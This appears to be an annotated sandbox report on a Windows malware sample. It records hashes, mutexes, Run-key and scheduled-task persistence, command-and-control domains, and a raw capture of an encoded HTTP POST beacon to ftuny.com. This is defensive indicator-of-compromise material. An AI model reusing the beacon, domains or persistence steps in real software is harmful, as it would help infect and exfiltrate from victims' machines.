Analysis Date: 2014-08-22 11:09:03
MD5: 8d2076cbd7adda395f7c96fa86072849
SHA1: 0b2f2fdecf665e05e1114e20efae93ebdbc12eeb

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section CODE   md5: 76016e0296694eb649b402f60ecb5c42 sha1: 251d3c601152232750b375c78c76982418d729f4 size: 14848
Section DATA   md5: 4f72eccf9eae06b6d6febb840b39512b sha1: 2f183df720f6b87929ae46c3b1c65bd4e1fe9c02 size: 154624
Section BSS    md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0 (these are the MD5/SHA-1 of empty input, consistent with a zero-length raw section)
Section .idata md5: 3827bd350e8b7ac1e17dca963574ec34 sha1: ee3b3a3b27391765670c519e1eb77144d49c50be size: 3072
Section .reloc md5: f4ad603ee7786113a6a94f321e453fc1 sha1: f28ac84b25d1607d1e1614f6dda1dcc95c791094 size: 1024
Section .rsrc  md5: fcd0a701513266715f9bad81786fd98d sha1: c09d11c940c3cca596fe259712ea3c165641ecb2 size: 1024
Timestamp: 1992-06-19 22:22:17 (this fixed value is typical of Borland/Delphi-linked binaries — consistent with the CODE/DATA/BSS section names and the "This program must be run under Win32" string below — so it should not be treated as the real build date)
PEhash: 4b0869cd06f8a3ccaa279934c20eb8b27fd47f76
IMPhash (import hash): c026b969030c0f9a87fb6d5cce0ff1c3

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates Process: C:\malware.exe
Creates Mutex: Global\{F5CC5A0A-B9E5-411f-BF7E-EACE3BBC2BF1}
Creates Mutex: {A14B1A1D-023F-40dc-BBFE-208B1DAD2F82}
(Both GUID-named mutexes are created again by the second process instance below; hard-coded mutex names of this kind are usable host-based indicators.)

Process
↳ C:\malware.exe

Registry (autorun persistence via HKCU Run key): HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Q7NZMT7RLB ➝
C:\malware.exe
Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
Registry (sample-specific key; same randomised name Q7NZMT7RLB as the Run value above — value is a base64-looking blob, contents not decoded here): HKEY_CURRENT_USER\Software\Q7NZMT7RLB\OteH ➝
xC7aKZ+O6wyPlq1krRM4sG7m2LFGsYtHjHOagBf10Uk/n4gL8s8xs9LeD5KQVh3/j+XFa0mnr175UElKKyciA2gn6tUEA721Fj4P\\x00
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\\\x03\1601 ➝
NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates File: C:\WINDOWS\Tasks\{22116563-108C-42c0-A7CE-60161B75E508}.job (a Task Scheduler job file — likely a second persistence mechanism alongside the Run key; the task's action is not shown in this report)
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: Global\{F5CC5A0A-B9E5-411f-BF7E-EACE3BBC2BF1}
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex: {A14B1A1D-023F-40dc-BBFE-208B1DAD2F82}
(The index.dat files and WininetConnectionMutex / path-style mutexes are WinINet side effects, consistent with the HTTP request below being issued through WinINet rather than raw sockets.)
Winsock DNS: topkio.com
Winsock DNS: ftuny.com

Network Details:

DNS: wp.pl
Type: A
212.77.100.101
DNS: spankwire.com
Type: A
94.199.252.72
DNS: 51.la
Type: A
117.21.226.199
(These three are lookups of unrelated, well-known public domains; possibly connectivity checks — not confirmed by this report.)
DNS: ftuny.com (resolved to five A records; the first one is used for the POST below)
Type: A
208.73.211.175
DNS: ftuny.com
Type: A
208.73.211.174
DNS: ftuny.com
Type: A
208.73.211.163
DNS: ftuny.com
Type: A
208.73.211.242
DNS: ftuny.com
Type: A
208.73.211.193
DNS: topkio.com
Type: A (no address recorded)
DNS: phreeway.com
Type: A (no address recorded)
DNS: tirefondn.com
Type: A (no address recorded)
HTTP POST: http://ftuny.com/borders.php (body is "data=" followed by a base64-like blob, Content-Length 341 — see Raw Pcap; the URI, the "data=" prefix and the hard-coded User-Agent below together make a usable network signature)
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Flows TCP: 192.168.1.1:1031 ➝ 208.73.211.175:80

Raw Pcap
0x00000000 (00000)   504f5354 202f626f 72646572 732e7068   POST /borders.ph
0x00000010 (00016)   70204854 54502f31 2e310d0a 41636365   p HTTP/1.1..Acce
0x00000020 (00032)   70743a20 2a2f2a0d 0a436f6e 74656e74   pt: */*..Content
0x00000030 (00048)   2d547970 653a2061 70706c69 63617469   -Type: applicati
0x00000040 (00064)   6f6e2f78 2d777777 2d666f72 6d2d7572   on/x-www-form-ur
0x00000050 (00080)   6c656e63 6f646564 0d0a5573 65722d41   lencoded..User-A
0x00000060 (00096)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000070 (00112)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x00000080 (00128)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x00000090 (00144)   204e5420 352e3029 0d0a486f 73743a20    NT 5.0)..Host: 
0x000000a0 (00160)   6674756e 792e636f 6d0d0a43 6f6e7465   ftuny.com..Conte
0x000000b0 (00176)   6e742d4c 656e6774 683a2033 34310d0a   nt-Length: 341..
0x000000c0 (00192)   436f6e6e 65637469 6f6e3a20 4b656570   Connection: Keep
0x000000d0 (00208)   2d416c69 76650d0a 43616368 652d436f   -Alive..Cache-Co
0x000000e0 (00224)   6e74726f 6c3a206e 6f2d6361 6368650d   ntrol: no-cache.
0x000000f0 (00240)   0a0d0a64 6174613d 2f436a45 665a4453   ...data=/CjEfZDS
0x00000100 (00256)   76787143 694b306c 74554d31 7579322f   vxqCiK0ltUM1uy2/
0x00000110 (00272)   79753455 3559704e 6d31762f 2f6a546e   yu4U5YpNm1v//jTn
0x00000120 (00288)   6756632b 774d732b 2b5a426a 375a5359   gVc+wMs++ZBj7ZSY
0x00000130 (00304)   54723369 426b472f 672b3756 43432f30   Tr3iBkG/g+7VCC/0
0x00000140 (00320)   7055336b 4f487037 65526348 5069596f   pU3kOHp7eRcHPiYo
0x00000150 (00336)   3939494d 55756a67 55573462 76544964   99IMUujgUW4bvTId
0x00000160 (00352)   4e2f6a50 58754750 6a61427a 786c6363   N/jPXuGPjaBzxlcc
0x00000170 (00368)   356d704e 30316136 742f5169 53585877   5mpN01a6t/QiSXXw
0x00000180 (00384)   707a3948 6d306b7a 39664266 61556e31   pz9Hm0kz9fBfaUn1
0x00000190 (00400)   30782f47 4c636f66 52694834 4c764673   0x/GLcofRiH4LvFs
0x000001a0 (00416)   41694759 46736169 6f4d5730 374b3045   AiGYFsaioMW07K0E
0x000001b0 (00432)   33726b6b 334d655a 55796744 654c4777   3rkk3MeZUygDeLGw
0x000001c0 (00448)   32733132 2b6f504d 4e726e4a 5a637a68   2s12+oPMNrnJZczh
0x000001d0 (00464)   7a5a3878 694e5775 3554674f 6871344f   zZ8xiNWu5TgOhq4O
0x000001e0 (00480)   71555330 424d5464 4b32625a 792f6878   qUS0BMTdK2bZy/hx
0x000001f0 (00496)   33546e6d 47795446 4c48684c 6352662b   3TnmGyTFLHhLcRf+
0x00000200 (00512)   76417a49 4f424e6d 76343343 444b3251   vAzIOBNmv43CDK2Q
0x00000210 (00528)   30354156 636d4138 324b6854 66557373   05AVcmA82KhTfUss
0x00000220 (00544)   2f476f6c 77786c6d 396b4c6e 726e6c49   /Golwxlm9kLnrnlI
0x00000230 (00560)   2b356736 6e333664 2f33346b 6f465630   +5g6n36d/34koFV0
0x00000240 (00576)   61365169 2f673d3d                     a6Qi/g==


Strings (note: the scattered manifest fragments below request requestedExecutionLevel level="highestAvailable" under the assemblyIdentity name "Windows Setup UAC", and the import names include VirtualAllocEx, VirtualProtect, LoadLibraryA and GetProcAddress)
K}.".."'......
...
y@0P
i.
-.
..4.O..
.
L.E...
@_:J.
..f.2..s.......A..
..
k.tw.K
.)8.
,M.

#/|&
{09S
	1k!
1t(U/
&%(3
3oyt
!4v{
5~?[
'59M
@6aup
)8aB
8 j}
8S-}
!8vnB
9 [PQ^
AIt(
a}j]
ap%f1
}cKT
%ECa
F`>[
[Fd:
GF\6
gQ1w
HH<u
ir@{
K[<1'
|Kc}
km#e
m#hm
p?Oo
Qm'd
rR&;
\"SL
\So"
;t7T
t8a~u]6
tbQ!}
TgDL
!tIb3
tTm@V
^tTu4
:tXs
ue"m
(V`{
vbc%r
v&CU
wBc<s
wCq~$
w?_o
w,<S
x8%9T(
X?Vz
y:FD	
Zh:"
z!HGZ
0/AjG1}
12d9a3ea
2"2*222:2B2J2R2Z2b2j2r2z2
3%3+31373=3C3I3O3U3[3a3g3m3s3y3
3&3.363>3F3N3V3^3f3n3v3~3
4!4'4-43494?4E4K4Q4W4]4c4i4o4u4{4
4&4.464>4F4N4V4^4f4n4v4~4
7Sj%#L
8:<ja8?
9&9-949<9C9X9,:3:{<
9F<P<q=
>a%081
AppCompat_RunDLLW
  </application> 
  <application> 
</assembly>
   <assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Windows Setup UAC" type="win32"/>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> 
B1+!h=w
B4:u(y
@BJ;m,w	
CallNamedPipeA
ChildWindowFromPoint
ChooseFontA
CoCreateFreeThreadedMarshaler
CoGetTreatAsClass
CoInitialize
comdlg32.dll
CommDlgExtendedError
CommitSpoolData
CompareFileTime
</compatibility> 
<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"> 
CopyFileExA
CopyFileExW
CoQueryReleaseObject
CreateHardLinkW
CreateWindowExA
DefFrameProcW
DeletePrintProvidorW
DestroyCaret
DEVICECAPABILITIES
DevQueryPrintEx
DllGetVersion
DragQueryFileW
EqualRect
EXTDEVICEMODE
FlushConsoleInputBuffer
freeaddrinfo
fv<+ED
GetClassWord
GetEnvironmentVariableA
GetFileTitleW
GetHGlobalFromILockBytes
GetOpenFileNameA
GetOpenFileNameW
GetProcAddress
GetSaveFileNameW
GetSystemDefaultLCID
GetWindowTextA
GetWindowThreadProcessId
ICJI9-
.idata
InflateRect
InternalExtractIconListW
IntersectRect
IsValidInterface
kernel32.dll
KKGJ;E
LoadLibraryA
LoadLibraryExA
LocalAlloc
LocalFree
'{m+,,,
M0W0`0f0l0
(}nGF?
OffsetRect
ole32.dll
OleCreateLinkFromData
OleDuplicateData
OleIsCurrentClipboard
OpenAs_RunDLL
Options_RunDLLA
O=ZQ1j
PageSetupDlgW
PathAddBackslashA
PathCanonicalizeW
PathCompactPathExA
PathFindFileNameW
PathFindOnPathW
PathIsSameRootA
pb?[*6
PrintDlgExA
PrintDlgW
P.rsrc
PtInRect
p;t;x;
RealShellExecuteW
regapi
.reloc
ReplaceTextW
            <requestedExecutionLevel level="highestAvailable"/> 
         </requestedPrivileges>
         <requestedPrivileges>
      </security>
      <security>
SetLocaleInfoW
SetPortA
SetWindowTextA
SHBrowseForFolder
SHBrowseForFolderW
SHChangeNotifySuspendResume
SHCreateLocalServerRunDll
shell32.dll
SHFreeNameMappings
SHGetSpecialFolderPathA
SHGetThreadRef
SHInvokePrinterCommandW
shlwapi.dll
SHOpenRegStreamA
SHPathPrepareForWriteA
SHRegGetPathW
SHRegQueryInfoUSKeyW
SHStrDupA
StrCatBuffA
StrCmpNW
StrCpyW
StringX
StrRChrIA
StrRStrIA
StrStrNW
      <supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/> 
      <supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/> 
?(?S?Z?o?
)=t,,,
    <!--The ID below indicates application support for Windows 7 --> 
    <!--The ID below indicates application support for Windows Vista --> 
This program must be run under Win32
   </trustInfo>
      <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
UnionRect
UrlApplySchemeA
UrlCreateFromPathA
user32.dll
VirtualAllocEx
VirtualFree
VirtualProtect
vpVe/j
WantArrows
WindowFromPoint
winspool.drv
WriteFileEx
ws2_32.dll
WSAAddressToStringW
WSAEnumProtocolsW
WSAInstallServiceClassA
WSAJoinLeaf
WSANtohs
WSASendDisconnect
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
ZsPiH\